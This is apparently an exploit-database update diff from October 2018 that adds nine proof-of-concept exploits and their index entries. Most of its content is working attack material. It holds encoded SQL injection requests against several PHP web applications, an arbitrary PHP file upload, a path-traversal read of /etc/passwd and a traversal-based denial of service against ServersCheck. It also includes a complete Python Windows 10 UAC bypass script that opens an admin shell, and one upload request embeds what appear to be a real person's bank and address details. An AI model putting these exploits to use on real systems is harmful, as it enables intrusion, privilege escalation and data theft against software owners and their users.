DB: 2018-10-24

9 changes to exploits/shellcodes

AudaCity 2.3 - Denial of Service (PoC)
Audacity 2.3 - Denial of Service (PoC)

ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)

Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)
Appsource School Management System 1.0 - 'student_id' SQL Injection
SIM-PKH 2.4.1 - Arbitrary File Upload
ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection
School ERP Pro+Responsive 1.0 - Arbitrary File Download
School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
SIM-PKH 2.4.1 - 'id' SQL Injection
MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection

exploits/php/webapps/45657.txt

@@ -0,0 +1,58 @@
+# Exploit Title: Appsource School Management System 1.0 - 'student_id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-19
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.appsource.ug/school/
+# Software Link: https://sourceforge.net/p/appsource-school-system/code/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# Description
+# Librarian, Teacher members can run the sql codes.
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php?page=subject_allocation&teacher_id=[SQL]&selection_type=allocate_new_subject&token=
+
+GET /[PATH]/index.php?page=subject_allocation&teacher_id=%2d%33%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d&selection_type=allocate_new_subject&token=6f241aabc241c0f1567f2eef2eb9605f HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: __test=0873e299cd6c3e39a7898a55d9894bc6; PHPSESSID=6ac2af1ef1b06c03438adef38b554175
+Connection: keep-alive
+HTTP/1.1 200 OK
+Server: nginx
+Date: Fri, 19 Oct 2018 10:52:53 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Vary: Accept-Encoding
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/index.php?page=give_studentbook&action=borror_book&student_id=[SQL]
+
+GET /[PATH]/index.php?page=give_studentbook&action=borror_book&student_id=%31%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: __test=0873e299cd6c3e39a7898a55d9894bc6; PHPSESSID=6ac2af1ef1b06c03438adef38b554175
+Connection: keep-alive
+HTTP/1.1 200 OK
+Server: nginx
+Date: Fri, 19 Oct 2018 10:58:27 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Vary: Accept-Encoding
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache

exploits/php/webapps/45659.txt

@@ -0,0 +1,173 @@
+# Exploit Title: SIM-PKH 2.4.1 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-22
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://simpkh.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/simpkh/files/latest/download
+# Version: 2.4.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 2)
+# Everyone....
+
+<form method="POST" enctype="multipart/form-data" action="http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update">
+<input name="fupload" type="file"> 
+<input value="Upload" type="submit"></td></tr>
+</form>
+
+# Upload Path: http://localhost/[PATH]/foto/59phpinfo2.php
+
+POST /[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------10453613844351558052030056362
+Content-Length: 261
+-----------------------------10453613844351558052030056362
+Content-Disposition: form-data; name="fupload"; filename="phpinfo2.php"
+Content-Type: application/force-download
+<?php
+phpinfo();
+?>
+-----------------------------10453613844351558052030056362--
+HTTP/1.1 200 OK
+Date: Mon, 22 Oct 2018 15:59:01 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 5554
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+
+# http://localhost/[PATH]/foto/59phpinfo2.php
+
+GET /sim-pkh/foto/59phpinfo2.php HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 22 Oct 2018 15:59:28 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# Users....
+# http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update
+ 
+# Upload Path: http://localhost/[PATH]/foto/25phpinfo.php
+
+POST /[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: [PATH]/admin/media.php?module=pengurus&act=editpengurus&id=320323241474
+Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------84876618815601613714142368
+Content-Length: 2745
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_pengurus"
+320323241474
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="no_rekening"
+0401741906
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="nama"
+IMAS
+
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="tempat"
+SUKABUMI
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="tl"
+1985-11-08
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="Usia"
+33
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="fupload"; filename="phpinfo.php"
+Content-Type: application/force-download
+<?php
+phpinfo();
+?>
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="pekerjaan"
+BURUH
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="ibu_kandung"
+ELIS
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="suami"
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="alamat"
+KP BABAKAN RT 09 RW 02     
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="no_hp"
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_desa"
+4
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_kelompok"
+13
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_jabatan"
+2
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_status"
+1
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_pendamping"
+pdp-01
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="bumil"
+0
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="balita"
+1
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="apras"
+1
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="sd"
+0
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="smp"
+2
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="sma"
+0
+-----------------------------84876618815601613714142368--
+HTTP/1.1 302 Found
+Date: Mon, 22 Oct 2018 15:42:39 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: ../../media.php?module=pengurus
+Content-Length: 1976
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45662.txt

@@ -0,0 +1,64 @@
+# Exploit Title: School ERP Pro+Responsive 1.0 - Arbitrary File Download
+# Dork: N/A
+# Date: 2018-10-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.arox.in/
+# Software Link: https://sourceforge.net/projects/school-management-system-php/files/latest/download
+# Software Link: http://erp.arox.in/ http://erp1.arox.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/student_staff/download.php?document=[FILE]
+# http://localhost/[PATH]/office_admin/download.php?document=[FILE]
+# 
+# /[PATH]/student_staff/download.php
+# /[PATH]/office_admin/download.php
+# ....
+# if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") {
+# $file = $_REQUEST['document'];
+# header("Content-type: application/force-download");
+# header("Content-Transfer-Encoding: Binary");
+# header("Content-length: ".filesize($file));
+# header("Content-disposition: attachment; filename=\"".$file."\"");
+# readfile($file);
+# exit;
+# }
+# ....
+
+GET /[PATH]/student_staff/download.php?document=download.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 23 Oct 2018 12:30:01 GMT
+Server: Apache
+Content-Transfer-Encoding: Binary
+Content-Disposition: attachment; filename="download.php"
+Content-Length: 337
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: application/force-download
+
+GET /[PATH]/office_admin/download.php?document=../../../../../etc/passwd HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 23 Oct 2018 12:31:34 GMT
+Server: Apache
+Content-Transfer-Encoding: Binary
+Content-Disposition: attachment; filename="../../../../../etc/passwd"
+Content-Length: 46368
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: application/force-download

exploits/php/webapps/45663.txt

@@ -0,0 +1,34 @@
+# Exploit Title: School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
+# Dork: N/A
+# Date: 2018-10-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.arox.in/
+# Software Link: https://sourceforge.net/projects/school-management-system-php/files/latest/download
+# Software Link: http://erp.arox.in/ http://erp1.arox.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/student_staff/?pid=54&action=staff_timetable&fid=[SQL]
+
+GET /[PATH]/student_staff/?pid=54&action=staff_timetable&fid=-%31%20%75%6e%49%6f%4e%20%73%45%6c%45%63%74%20%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=nno01rkuj0ql0k1sb96uhg1va1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 23 Oct 2018 12:11:18 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 68790
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45664.txt

@@ -0,0 +1,35 @@
+# Exploit Title: SIM-PKH 2.4.1 - 'id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-22
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://simpkh.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/simpkh/files/latest/download
+# Version: 2.4.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Users....
+# http://localhost/[PATH]/admin/media.php?module=pengurus&act=editpengurus&id=[SQL]
+ 
+GET /[PATH]/admin/media.php?module=pengurus&act=editpengurus&id=-1%27++UniOn(sELect+0x283129%2cCONCAT(0x203a20,User(),DatabaSE(),VErsiON())%2c0x283329%2c0x283429%2c0x283529%2c%30%78%32%38%33%36%32%39%2c0x283729%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c%30%78%32%38%33%31%33%37%32%39%2c0x28313829%2c0x28313929%2c0x28323029%2c%30%78%32%38%33%32%33%31%32%39%2c0x28323229)--+- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 22 Oct 2018 15:31:42 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8

exploits/windows/dos/45658.txt

@@ -0,0 +1,41 @@
+# Exploit Title: ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)
+# Author: John Page (aka hyp3rlinx)
+# Date: 2018-10-23
+# Vendor: www.serverscheck.com
+# Software Link: http://downloads.serverscheck.com/monitoring_software/setup.exe
+# CVE: N/A
+# References: 
+# http://hyp3rlinx.altervista.org/advisories/CVE-2018-18552-SERVERSCHECK-MONITORING-SOFTWARE-ARBITRARY-FILE-WRITE-DOS.txt
+# https://serverscheck.com/monitoring-software/release.asp
+# Affected Component: "sensor_details.html" webpage the "id" parameter
+
+# Security Issue
+# ServersCheck Monitoring Software allows remote attackers to cause a denial of service 
+# (menu functionality loss) by creating an LNK file that points to a second LNK file, if this 
+# second LNK file is associated with a Start menu item. Ultimately, this behavior comes 
+# from a Directory Traversal bug (via the sensor_details.html id parameter) that allows 
+# creating empty files in arbitrary directories. 
+
+# Exploit/POC
+# DOS Command Prompt .LNK under Start Menu change <VICTIM> to desired user.
+
+http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Command%20Prompt.lnk%00
+
+# DOS Run .LNK under Start Menu 
+
+http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Run.lnk%00
+
+# DOS Internet Explorer .LNK from Start Menu 
+http://127.0.0.1:1272/sensor_details.html?id=../../../../Users/<VICTIM>/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Internet Explorer.LNK%00
+
+# Victim will get error message from server like "Error retrieving sensor details from database".
+# Then,No Internet Explorer, Command or Run prompt via the Start/Programs/Accessories/ 
+# and Task Menu links. However, can still be launch by other means. Tested successfully on 
+# Windows 7 OS
+
+# [Disclosure Timeline]
+# Vendor Notification: October 6, 2018
+# Vendor acknowledgement: October 7, 2018
+# Vendor release v14.3.4 : October 7th, 2018 
+# CVE assign by Mitre: October 21, 2018
+# October 22, 2018 : Public Disclosure

exploits/windows/local/45660.py

@@ -0,0 +1,48 @@
+#!/usr/bin/env python
+#
+# Exploit Title: Windows 10 UAC Bypass by computerDefault
+# Date: 2018-10-18
+# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
+# Twitter: st0rnpentest
+#
+# Vendor Homepage: www.microsoft.com
+# Version: Version 10.0.17134.285
+# Tested on: Windows 10 pro Version 10.0.17134.285
+#
+
+import os
+import sys
+import ctypes
+import _winreg
+
+
+def create_reg_key(key, value):
+    try:        
+        _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
+        registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)                
+        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)        
+        _winreg.CloseKey(registry_key)
+    except WindowsError:        
+        raise
+
+def exec_bypass_uac(cmd):
+    try:
+        create_reg_key('DelegateExecute', '')
+        create_reg_key(None, cmd)    
+    except WindowsError:
+        raise
+
+def bypass_uac():        
+ try:                
+    current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
+    cmd = "C:\windows\System32\cmd.exe"
+    exec_bypass_uac(cmd)                
+    os.system(r'C:\windows\system32\ComputerDefaults.exe')  
+    return 1               
+ except WindowsError:
+    sys.exit(1)       
+
+if __name__ == '__main__':
+
+    if bypass_uac():
+		print "Enjoy your Admin Shell :)"

exploits/windows/webapps/45661.txt

@@ -0,0 +1,58 @@
+# Exploit Title: ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection
+# Author: John Page (aka hyp3rlinx)	
+# Date: 2018-10-23
+# Vendor: www.serverscheck.com
+# Software link: http://downloads.serverscheck.com/monitoring_software/setup.exe
+# CVE: N/A
+# References:
+# https://serverscheck.com/monitoring-software/release.asp
+# http://hyp3rlinx.altervista.org/advisories/CVE-2018-18550-SERVERSCHECK-MONITORING-SOFTWARE-SQL-INJECTION.txt
+
+# Security Issue
+# ServersCheck Monitoring Software allows for SQL Injection by an authenticated user 
+# via the alerts.html "id" parameter.
+
+# Exploit/POC
+http://127.0.0.1:1272/alerts.html?id=18391
+
+Result:
+Alerts History for SENSORXY
+No data available in table
+
+Then using 'OR+2=2,
+
+http://127.0.0.1:1272/alerts.html?id=18391+'OR+2=2+--+
+
+Result:
+
+Alerts History for test
+155 	a day ago 	CPU on 127.0.0.1 	Status Change 	DOWN to OK 	
+154 	a day ago 	CPU on 127.0.0.1 	Status Change 	OK to DOWN 	
+153 	a day ago 	test 	Status Change 	OK to DOWN 	Unable to connect to host
+
+
+# SQL Injection - original page results successfully manipulated using 18391-2
+# Examples:
+
+http://127.0.0.1:1272/alerts.html?id=18391
+No data available in table
+
+Then using 34 minus 2,
+
+http://127.0.0.1:1272/alerts.html?id=18391-2
+153 	a day ago 	test 	Status Change 	OK to DOWN 	Unable to connect to host
+
+and minus 1,
+
+http://127.0.0.1:1272/alerts.html?id=18391-1
+155 	a day ago 	CPU on 127.0.0.1 	Status Change 	DOWN to OK 	
+154 	a day ago 	CPU on 127.0.0.1 	Status Change 	OK to DOWN
+
+
+http://127.0.0.1:1272/floorplans.html?floorplan=34
+Floor Plan PLANXY
+
+Then using 34 minus 2,
+
+http://127.0.0.1:1272/floorplans.html?floorplan=34-2
+Floor Plan 0

exploits/windows/webapps/45665.txt

@@ -0,0 +1,35 @@
+# Exploit Title: MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.m-gb.org/
+# Software Link: https://sourceforge.net/projects/mopzz-gb/files/latest/download
+# Version: 0.7.0.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/email.php?id=[SQL]
+ 
+GET /[PATH]/email.php?id=admin%27++uniOn+selEct+(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%32%2c%33%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 23 Oct 2018 15:50:23 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Set-Cookie: newentry=rjic8lu5atciee1fsacguocub3; path=/
+Set-Cookie: newentry=jd795jb06ni96fqhir90cahhp7; path=/
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8

files_exploits.csv

@@ -6148,13 +6148,14 @@ id,file,description,date,author,type,platform,port
 45572,exploits/windows/dos/45572.js,"Microsoft Edge Chakra JIT - Type Confusion",2018-10-09,"Google Security Research",dos,windows,
 45579,exploits/android/dos/45579.txt,"WhatsApp - RTP Processing Heap Corruption",2018-10-10,"Google Security Research",dos,android,
 45641,exploits/windows_x86/dos/45641.py,"Modbus Poll 7.2.2 - Denial of Service (PoC)",2018-10-22,"Cemal Cihad ÇİFTÇİ",dos,windows_x86,
-45644,exploits/windows/dos/45644.pl,"AudaCity 2.3 - Denial of Service (PoC)",2018-10-22,"Kağan Çapar",dos,windows,
+45644,exploits/windows/dos/45644.pl,"Audacity 2.3 - Denial of Service (PoC)",2018-10-22,"Kağan Çapar",dos,windows,
 45647,exploits/macos/dos/45647.c,"Apple Intel GPU Driver - Use-After-Free/Double-Delete due to bad Locking",2018-10-22,"Google Security Research",dos,macos,
 45648,exploits/multiple/dos/45648.txt,"Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem",2018-10-22,"Google Security Research",dos,multiple,
 45649,exploits/ios/dos/45649.txt,"Apple iOS - Kernel Stack Memory Disclosure due to Failure to Check copyin Return Value",2018-10-22,"Google Security Research",dos,ios,
 45650,exploits/multiple/dos/45650.txt,"Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory",2018-10-22,"Google Security Research",dos,multiple,
 45651,exploits/multiple/dos/45651.c,"Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport",2018-10-22,"Google Security Research",dos,multiple,
 45652,exploits/ios/dos/45652.c,"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas",2018-10-22,"Google Security Research",dos,ios,
+45658,exploits/windows/dos/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)",2018-10-23,hyp3rlinx,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10046,6 +10047,7 @@ id,file,description,date,author,type,platform,port
 45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86,
 45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
 45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
+45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40171,3 +40173,10 @@ id,file,description,date,author,type,platform,port
 45654,exploits/php/webapps/45654.txt,"eNdonesia Portal 8.7 - 'artid' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
 45655,exploits/php/webapps/45655.txt,"The Open ISES Project 3.30A - Arbitrary File Download",2018-10-22,"Ihsan Sencan",webapps,php,
 45656,exploits/php/webapps/45656.txt,"Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
+45657,exploits/php/webapps/45657.txt,"Appsource School Management System 1.0 - 'student_id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,
+45659,exploits/php/webapps/45659.txt,"SIM-PKH 2.4.1 - Arbitrary File Upload",2018-10-23,"Ihsan Sencan",webapps,php,
+45661,exploits/windows/webapps/45661.txt,"ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection",2018-10-23,hyp3rlinx,webapps,windows,
+45662,exploits/php/webapps/45662.txt,"School ERP Pro+Responsive 1.0 - Arbitrary File Download",2018-10-23,"Ihsan Sencan",webapps,php,
+45663,exploits/php/webapps/45663.txt,"School ERP Pro+Responsive 1.0 - 'fid' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,
+45664,exploits/php/webapps/45664.txt,"SIM-PKH 2.4.1 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,
+45665,exploits/windows/webapps/45665.txt,"MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,windows,